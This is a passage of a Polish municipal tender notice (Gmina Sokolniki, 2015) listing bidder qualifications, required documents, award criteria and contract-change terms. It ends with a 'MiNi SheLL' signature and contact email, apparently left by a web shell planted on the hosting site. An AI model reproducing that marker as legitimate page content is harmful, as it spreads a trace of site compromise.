              ograniczonym zakresie uprawniają do projektowania obiektu budowlanego lub kierownia robotami budowlanymi związanymi z obiektem budowlanym, takim jak 1) droga klasy : lokalna i dojazdowa oraz droga wewnętrzna, w rozumieniu przepisów o drogach publicznych, z wyłączeniem drogowych obiektów inżynieryjnych oprócz przepustów: 2) droga na terenie lotniska, nieprzeznaczona dla ruchu i postoju statków powietrznych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
        c) projektant sieci kanalizacyjnej - uprawnienia budowlane w specjalności instalacyjnej w
             zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych
             i kanalizacyjnych w ograniczonym zakresie uprawniają do projektowania lub kierowania
             robotami budowlanymi przy wykonywaniu instalacji wraz z przyłączami i instalowaniem
             tych urządzeń dla obiektów budowlanych o kubaturze do 1000 m3(lub odpowiadające im
             równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej
             obowiązujących przepisów),
         d) projektant sieci elektrycznej - uprawnienia budowlane w specjalności instalacyjnej w 
             zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń 
             uprawniają do projektowania obiektu budowlanego lub kierowania robotami budowlanymi
             związanymi z obiektem budowlanym, takim jaki: sieci, instalacje i urządzenia elektryczne i
             elektroenergetyczne, w tym kolejowe, trolejbusowe i tramwajowe sieci trakcyjne, sieci
             trakcyjne metra, wraz z instalacjami i urządzeniami technicznymi zasilania, w tym
             kolejowej, trolejbusowej, tramwajowej sieci trakcyjnej, sieci trakcyjne metra oraz
             elektrycznego ogrzewania rozjazdów (lub odpowiadające im równoważne uprawnienia
             budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
         e) geodeta - uprawnienia zawodowe w zakresie geodezyjnych pomiarów sytuacyjno - 
             wysokościowych, realizacyjnych i inwentaryzacyjnych lub w zakresie geodezyjnej
             obsługi inwestycji,

          f) geolog - posiadający kwalifikacje do wykonania dozorowania i kierowania pracami 
              geologicznymi kategorii VI lub  VII.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności
          cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum :
          100.000,00  zł.
Wymagane jest wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000,00 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Termin wykonania - 10.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonania zmiany umowy zgodnie z art.144 ustawy, w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków. 
18.1.Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach :  
  1) zmiany terminu realizacji przedmiotu umowy wyłącznie w przypadku zaistnienia siły wyższej
      lub w innych wyjątkowych okolicznościach i zdarzeniach zewnętrznych, niezależnych od woli
      stron, których nie były one w stanie przewidzieć przy zawieraniu umowy, a na które to
      okoliczności nie miały wpływu i którym nie mogły zapobiec pomimo dochowania należytej
      staranności; za siłę wyższą  nie uważa się działania zawinionego przez stronę albo osobę trzecią
      za która strona odpowiada, jak również braku środków finansowych,
  2) zmiany zakresu przedmiotu umowy w przypadku wystąpienia istotnych zmian przepisów lub
      norm mających zastosowanie do przedmiotu umowy uniemożliwiających wykonanie
      przedmiotu zamówienia zgodnie z SIWZ,
  3) zmiany zakresu przedmiotu umowy w przypadku wystąpienia istotnej zmiany okoliczności
     powodującej, że wykonanie części przedmiotu zamówienia nie leży w interesie publicznym,
     czego nie można było przewidzieć w chwili zawarcia umowy,
   4) Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści
       oferty w zakresie zamiany zakresu przedmiotowego zamówienia ze względu na ograniczenie 
       zakresu przy jednoczesnym odpowiednim zmniejszeniu wynagrodzenia, jeżeli okaże się, że
       niektóre elementy składowe dokumentacji projektowej będą zbędne z punktu widzenia
       postępowania administracyjnego i procesu inwestycyjnego, czego nie można było przewidzieć
       w chwili zawarcia umowy. Zamawiający pisemnie poinformuje Wykonawcę o zbędności
       elementu/ów dokumentacji projektowej.
18.2.Warunki dokonania zmian : 
       1) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, 
           wyrażoną na piśmie, pod rygorem nieważności,
      2) strona występująca o zmianę postanowień zawartej umowy : 
opisze zaistniałą okoliczność,
uzasadni, udokumentuje zaistnienie powyżej okoliczności,
obliczy koszty zmiany, jeśli zmiana będzie miała wpływ na wynagrodzenie
Wykonawcy,
opisze wpływ zmiany na termin wykonania umowy.
3) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1, 98 - 420 Sokolniki, 
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2015 godzina 10:00, miejsce: Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1,98 - 420 Sokolniki,
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com